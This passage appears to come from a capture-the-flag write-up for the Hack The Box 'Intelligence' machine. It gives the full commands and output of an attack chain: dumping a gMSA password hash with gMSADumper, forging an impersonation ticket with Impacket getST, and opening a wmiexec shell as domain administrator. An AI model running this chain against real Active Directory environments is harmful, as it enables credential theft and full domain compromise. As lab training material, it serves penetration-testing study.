Ted.Graves is in the ITSupport group, which has ReadGMSAPassword on SVC_INT. Even more interestingly, if I use the pre-built query “Shortest Path from Owned Principals”, the svc_int account has AllowedToDelegate on the DC.
Download gMSADumper
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ wget https://github.com/micahvandeusen/gMSADumper/archive/refs/heads/main.zip
--2023-05-08 06:51:16-- https://github.com/micahvandeusen/gMSADumper/archive/refs/heads/main.zip
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/micahvandeusen/gMSADumper/zip/refs/heads/main [following]
--2023-05-08 06:51:16-- https://codeload.github.com/micahvandeusen/gMSADumper/zip/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 140.82.121.9
Connecting to codeload.github.com (codeload.github.com)|140.82.121.9|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’
main.zip [ <=> ] 16.66K --.-KB/s in 0.02s
2023-05-08 06:51:17 (726 KB/s) - ‘main.zip’ saved [17061]
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ unzip main.zip -d gMSADumper
Archive: main.zip
cbc13e034906331213b4575ee4e3d42f8bb7d5de
creating: gMSADumper/gMSADumper-main/
inflating: gMSADumper/gMSADumper-main/.gitignore
inflating: gMSADumper/gMSADumper-main/COPYING
inflating: gMSADumper/gMSADumper-main/README.md
extracting: gMSADumper/gMSADumper-main/__init__.py
inflating: gMSADumper/gMSADumper-main/gMSADumper.py
extracting: gMSADumper/gMSADumper-main/requirements.txt
Get and create ticket
Get SPN name
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ sudo ntpdate -s 10.10.10.248
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
>DC$
>itsupport
svc_int$:::fca9edf1c9fb8f031dfc38d918279642
svc_int$:aes256-cts-hmac-sha1-96:15516a903b67ce2aacda697b76fae9c2d1fc60e3408abc6587b2faeefb6bfac2
svc_int$:aes128-cts-hmac-sha1-96:4e25dcda503a43e8757abe3081892114
Craft ticket for SPN
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ sudo ntpdate -s 10.10.10.248
[sudo] password for kali:
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
>DC$
>itsupport
svc_int$:::fca9edf1c9fb8f031dfc38d918279642
svc_int$:aes256-cts-hmac-sha1-96:15516a903b67ce2aacda697b76fae9c2d1fc60e3408abc6587b2faeefb6bfac2
svc_int$:aes128-cts-hmac-sha1-96:4e25dcda503a43e8757abe3081892114
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ /home/kali/.local/bin/getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :fca9edf1c9fb8f031dfc38d918279642 -impersonate administrator intelligence.htb/svc_int
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
Login as administrator
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ export KRB5CCNAME=administrator.ccache
┌──(kali㉿kali)-[/mnt/…/PEN-200_vm_to_exam/HTB_Intelligence/gMSADumper/gMSADumper-main]
└─$ /home/kali/.local/bin/wmiexec.py -k -no-pass dc.intelligence.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
intelligence\administrator
C:\>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=================================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
intelligence\Group Policy Creator Owners Group S-1-5-21-4210132550-3389855604-3437519686-520 Mandatory group, Enabled by default, Enabled group
intelligence\Domain Admins Group S-1-5-21-4210132550-3389855604-3437519686-512 Mandatory group, Enabled by default, Enabled group
intelligence\Enterprise Admins Group S-1-5-21-4210132550-3389855604-3437519686-519 Mandatory group, Enabled by default, Enabled group
intelligence\Schema Admins Group S-1-5-21-4210132550-3389855604-3437519686-518 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
intelligence\Denied RODC Password Replication Group Alias S-1-5-21-4210132550-3389855604-3437519686-572 Mandatory group, Enabled by default, Enabled group, Local Group
Read flag: root.txt
C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is E3EF-EBBD
Directory of C:\Users\Administrator\Desktop
04/18/2021 05:51 PM <DIR> .
04/18/2021 05:51 PM <DIR> ..
05/07/2023 03:38 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,850,173,440 bytes free
C:\Users\Administrator\Desktop>type root.txt
4e1748910b9d23131132c5158a956150
References
Krbrelayx - Kerberos relaying and unconstrained delegation abuse toolkit
Abusing Kerberos From Linux - An Overview of Available Tools